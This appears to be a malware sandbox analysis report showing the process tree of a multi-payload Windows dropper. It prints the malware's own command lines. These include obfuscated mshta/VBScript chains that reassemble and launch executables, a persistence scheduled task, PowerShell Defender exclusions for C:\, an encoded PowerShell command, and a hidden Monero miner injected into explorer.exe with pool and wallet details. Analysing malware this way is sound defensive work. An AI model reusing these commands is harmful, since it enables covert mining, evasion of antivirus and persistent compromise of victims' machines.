- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0164db7e438.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue0164db7e438.exeTue0164db7e438.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-4LHA5.tmp\Tue0164db7e438.tmp"C:\Users\Admin\AppData\Local\Temp\is-4LHA5.tmp\Tue0164db7e438.tmp" /SL5="$5004E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue0164db7e438.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue0164db7e438.exe"C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue0164db7e438.exe" /SILENT8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01aa9c65fe676f9.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01aa9c65fe676f9.exeTue01aa9c65fe676f9.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01aa9c65fe676f9.exeC:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01aa9c65fe676f9.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01c895c354b.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01c895c354b.exeTue01c895c354b.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01c895c354b.exe"C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01c895c354b.exe" -u7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue011ad96d4eb.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue011ad96d4eb.exeTue011ad96d4eb.exe6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01152ad4a43.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01152ad4a43.exeTue01152ad4a43.exe6⤵
- Executes dropped EXE
-
C:\ProgramData\1415129.exe"C:\ProgramData\1415129.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\ProgramData\5229116.exe"C:\ProgramData\5229116.exe"7⤵
- Executes dropped EXE
-
C:\ProgramData\919927.exe"C:\ProgramData\919927.exe"7⤵
- Executes dropped EXE
-
C:\ProgramData\6811453.exe"C:\ProgramData\6811453.exe"7⤵
- Executes dropped EXE
-
C:\ProgramData\4239408.exe"C:\ProgramData\4239408.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"8⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01c0bbdb48.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01c0bbdb48.exeTue01c0bbdb48.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2688 -s 15289⤵
- Executes dropped EXE
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"10⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ffb6f4ddec0,0x7ffb6f4dded0,0x7ffb6f4ddee011⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff638289e70,0x7ff638289e80,0x7ff638289e9012⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1732,15325478683921143470,13471522206627134649,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_1301416401" --mojo-platform-channel-handle=1796 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1732,15325478683921143470,13471522206627134649,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_1301416401" --mojo-platform-channel-handle=2064 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1732,15325478683921143470,13471522206627134649,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_1301416401" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2552 /prefetch:111⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1732,15325478683921143470,13471522206627134649,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_1301416401" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2520 /prefetch:111⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1732,15325478683921143470,13471522206627134649,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_1301416401" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1748 /prefetch:211⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1732,15325478683921143470,13471522206627134649,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_1301416401" --mojo-platform-channel-handle=3032 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1732,15325478683921143470,13471522206627134649,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_1301416401" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3176 /prefetch:211⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1732,15325478683921143470,13471522206627134649,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_1301416401" --mojo-platform-channel-handle=2672 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1732,15325478683921143470,13471522206627134649,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_1301416401" --mojo-platform-channel-handle=2672 /prefetch:811⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1732,15325478683921143470,13471522206627134649,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_1301416401" --mojo-platform-channel-handle=1832 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1732,15325478683921143470,13471522206627134649,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_1301416401" --mojo-platform-channel-handle=844 /prefetch:811⤵
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"9⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe11⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"12⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"13⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"14⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue015b6b3a9094.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue015b6b3a9094.exeTue015b6b3a9094.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscriPT: cLOsE( crEaTeoBjEct ( "wsCriPT.ShEll" ). ruN ( "cMD /Q /r copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue015b6b3a9094.exe"" ..\GhXkKMW.EXe &&sTarT ..\GhXkKMW.Exe /pzztRb0w26vFPLWe3xRyQv & If """" == """" for %K in (""C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue015b6b3a9094.exe"") do taskkill /f /IM ""%~NXK"" ", 0, tRuE) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue015b6b3a9094.exe" ..\GhXkKMW.EXe &&sTarT ..\GhXkKMW.Exe /pzztRb0w26vFPLWe3xRyQv &If "" == "" for %K in ("C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue015b6b3a9094.exe") do taskkill /f /IM "%~NXK"8⤵
-
C:\Users\Admin\AppData\Local\Temp\GhXkKMW.EXe..\GhXkKMW.Exe /pzztRb0w26vFPLWe3xRyQv9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscriPT: cLOsE( crEaTeoBjEct ( "wsCriPT.ShEll" ). ruN ( "cMD /Q /r copY /Y ""C:\Users\Admin\AppData\Local\Temp\GhXkKMW.EXe"" ..\GhXkKMW.EXe &&sTarT ..\GhXkKMW.Exe /pzztRb0w26vFPLWe3xRyQv & If ""/pzztRb0w26vFPLWe3xRyQv "" == """" for %K in (""C:\Users\Admin\AppData\Local\Temp\GhXkKMW.EXe"") do taskkill /f /IM ""%~NXK"" ", 0, tRuE) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r copY /Y "C:\Users\Admin\AppData\Local\Temp\GhXkKMW.EXe" ..\GhXkKMW.EXe &&sTarT ..\GhXkKMW.Exe /pzztRb0w26vFPLWe3xRyQv &If "/pzztRb0w26vFPLWe3xRyQv " == "" for %K in ("C:\Users\Admin\AppData\Local\Temp\GhXkKMW.EXe") do taskkill /f /IM "%~NXK"11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScrIPT: cLose (creATeoBjECt ( "WscriPT.shELL" ).ruN ( "cmD.Exe /c eCHo | SeT /p = ""MZ"" > CejRuqC.56S & copY /Y /b CEJRUqC.56S +D5S9N.M + HOdVbD.N + 6Gk1G.c4O + JN1iGT.j ..\32aZBXCS.EP& sTARt msiexec.exe -y ..\32AZBxCS.EP & del /Q * ", 0 , True ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c eCHo | SeT /p = "MZ" > CejRuqC.56S & copY /Y /b CEJRUqC.56S +D5S9N.M + HOdVbD.N+ 6Gk1G.c4O +JN1iGT.j ..\32aZBXCS.EP& sTARt msiexec.exe -y ..\32AZBxCS.EP &del /Q *11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>CejRuqC.56S"12⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y ..\32AZBxCS.EP12⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /IM "Tue015b6b3a9094.exe"9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01c87a0e667ccf.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01c87a0e667ccf.exeTue01c87a0e667ccf.exe6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Public\run.exeC:\Users\Public\run.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\mn.exe"C:\Users\Admin\AppData\Local\Temp\mn.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 2688⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe7⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01ef2dca82e926ed.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01ef2dca82e926ed.exeTue01ef2dca82e926ed.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01ef2dca82e926ed.exeC:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01ef2dca82e926ed.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01ef2dca82e926ed.exeC:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01ef2dca82e926ed.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01d0efb597f.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01d0efb597f.exeTue01d0efb597f.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Dzpafigaxd.vbs"7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google\Qekdqa.exe'8⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dzpafigaxd.vbs"7⤵
-
C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\MSBuild.exeC:\Users\Admin\AppData\Local\Temp\MSBuild.exe7⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com8⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ngexauzae.vbs"8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\9⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAEkAZAAgADQAMgAyADgAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjAHEAZQBzAGsAcgB4AC4AZQB4AGUAIgA7ACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMwA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAIgBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAiACAALQBGAG8AcgBjAGUA8⤵
-
C:\Users\Admin\AppData\Local\Temp\cqeskrx.exe"C:\Users\Admin\AppData\Local\Temp\cqeskrx.exe"9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01694542e4ea7f27.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01694542e4ea7f27.exeTue01694542e4ea7f27.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0151406c8f0ef2187.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue0151406c8f0ef2187.exeTue0151406c8f0ef2187.exe6⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies system certificate store
-
C:\Users\Admin\Pictures\Adobe Films\NlV_KHWPqUv4Ag512VH5HAsr.exe"C:\Users\Admin\Pictures\Adobe Films\NlV_KHWPqUv4Ag512VH5HAsr.exe"7⤵
- Executes dropped EXE
-
